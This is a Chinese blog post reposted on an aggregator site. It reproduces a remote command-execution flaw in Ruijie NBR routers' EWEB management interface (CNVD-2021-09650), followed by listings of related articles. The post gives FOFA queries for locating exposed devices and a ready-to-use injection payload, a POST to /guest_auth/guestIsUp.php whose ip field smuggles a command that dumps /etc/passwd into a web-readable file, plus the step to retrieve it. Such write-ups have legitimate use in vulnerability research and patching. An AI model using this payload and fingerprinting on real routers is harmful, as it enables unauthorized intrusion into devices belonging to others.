1. Toy模板网首页
  2. > Toy博客

锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)

9月前 作者:孤桜懶契 分类:Toy博客 阅读(36) 违法举报

这篇具有很好参考价值的文章主要介绍了锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞描述

i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限

漏洞影响

s ✅锐捷NBR路由器 EWEB网管系统

空间测绘

d ⭕FOFA:title="锐捷网络-EWEB网管系统"

FOFA:icon_hash="-692947551"

漏洞复现

  • ✅访问首页

cnvd-2021-09650,漏洞复现,安全

  • ✅执行Payload命令
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

cnvd-2021-09650,漏洞复现,安全

  • 然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果

cnvd-2021-09650,漏洞复现,安全文章来源地址https://www.toymoban.com/news/detail-613420.html

个人博客

孤桜懶契:https://gylq.gitee.io/time

到了这里,关于锐捷 NBR路由器 远程命令执行漏洞(CNVD-2021-09650)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • 锐捷路由器配置命令完美宝典

    关于锐捷路由器配置命令,相信懂的人还不是很多,没有关系,下面就针对锐捷路由器,给大家详细的讲解一下,这些命令可能用的都不是很多,但是对于网络安全和性能来说很重要。 复制代码 代码如下: #Exit返回上一级操作模式 #del flash:config.text删除配置文件(交换机及170

    2024年02月07日
    浏览(44)
  • 【漏洞复现】锐捷 EWEB auth 远程命令执行漏洞

    【漏洞复现】锐捷 EWEB auth 远程命令执行漏洞

    免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。             

    2024年03月12日
    浏览(91)

  • 锐捷交换机,路由器,无线,ESS,EG所有操作配置命令合集

    接口注释 description Con_To_XX 记得/30的直连物理路由端口写ip ospf network point-to-point Ruijie(config-GigabitEthernet 0/0)#media-type basex force ---将接口切成 光模式 Ruijie(config-GigabitEthernet 0/0)#media-type baset  ---将接口从光口切换电口模式(接口默认属于该模式,show run该命令不显示) show ip f f 

    2024年02月12日
    浏览(65)

  • 锐捷Ruijie路由器版本升级

    1.路由器型号及版本 型号:RSR30-X-SPU10 当前版本:RGOS 10.4(3b36) Release(192911) 2.升级路由器 (1)电脑搭建TFTP, 手动将版本文件重命名为rgos.bin (2)电脑与路由器网线互联,配置互联IP地址,电脑IP-192.168.10.2,路由器IP-192.168.10.1 (3)登录路由器,从TFTP服务器拷贝版本文件至交换

    2024年02月09日
    浏览(38)
  • 锐捷RSR系列路由器_接入路由器交换模块配置_IP+MAC绑定

    锐捷RSR系列路由器_接入路由器交换模块配置_IP+MAC绑定

    目录 01  IP+MAC绑定配置案例 02  IP+MAC绑定常见问题   功能介绍 IP/MAC地址绑定是指路由器将与其直接相连的网络上的主机的MAC 地址和 IP 地址进行捆绑记录,只有指定的 MAC 地址才可以用相应的 IP 地址。这种机制可以防止被绑定的主机的IP地址不被假冒。应用这种机制有两个前

    2024年02月04日
    浏览(59)
  • 锐捷RSR系列路由器_接入路由器交换模块配置_802.1x认证配置

    锐捷RSR系列路由器_接入路由器交换模块配置_802.1x认证配置

    目录 01  RSR10-02E、RSR20-14E-F802.1x认证配置 02  802.1X认证常见问题和故障 03  路由器重启802.1X认证失败的解决方案   功能介绍 RSR10-02E、RSR20-14E/F固化交换端口,没有登陆交换卡这种概念,也无法登陆交换卡。路由/交换的所有配置都在路由器的CLI界面完成。 一、组网需求:   

    2024年03月16日
    浏览(56)
  • 锐捷RSR系列路由器—VPN功能—GRE 功能配置

    锐捷RSR系列路由器—VPN功能—GRE 功能配置

    目录 功能介绍 应用场景 一、组网需求 二、组网拓扑 三、配置要点 四、配置步骤 五、配置验证   GRE(Generic Routing Encapsulation,通用路由封装)协议是对某些网络层协议(如IP 和IPX)的数据报文进行封装,使这些被封装的数据报文能够在另一个网络层协议(如IP)中传输。

    2024年02月04日
    浏览(50)
  • 锐捷睿易:路由器WAN口三种上网方式的选择

    锐捷睿易:路由器WAN口三种上网方式的选择

    拨号上网: 有些路由器也叫宽带上网、ADSL拨号、PPPOE拨号等 拨号上网方式是向运营商办宽带的时候,运营商会给你一个账号、密码 在路由器上WAN口设置里选择连接了光猫的口,输入运营商给的账号和密码就可以上网了  动态获取: 也叫自动获取、DHCP上网、动态IP上网等 上

    2024年02月12日
    浏览(44)
  • 锐捷RSR系列路由器_安全_ACL访问控制列表

    锐捷RSR系列路由器_安全_ACL访问控制列表

    目录 01  ACL简介 02  标准ACL 03  扩展ACL 04  基于时间段的ACL 05  自反ACL 功能介绍: ACL 的全称为访问控制列表(Access Control Lists),俗称为防火墙,还称之为包过滤。ACL通过定义一些规则,对网络设备接口上的数据报文进行控制,根据匹配条件,决定是允许其通过(Permit) 还是丢弃

    2024年02月04日
    浏览(49)
  • 锐捷RSR系列路由器_安全_NAT 网络地址转换

    锐捷RSR系列路由器_安全_NAT 网络地址转换

    目录 01  NAT简介 02  源地址转换 2.1  上网配置-ADSL拨号(PPPoE)出口 2.2  上网配置——无交换口路由器 2.3  上网配置——固化交换模块路由器 2.4  上网配置——多出口及permit-inside功能 03  外部源地址转换 04  NAT实现TCP负载均衡 05  双向NAT转换 06  VRF  NAT 07  常见问题和故障

    2024年02月04日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包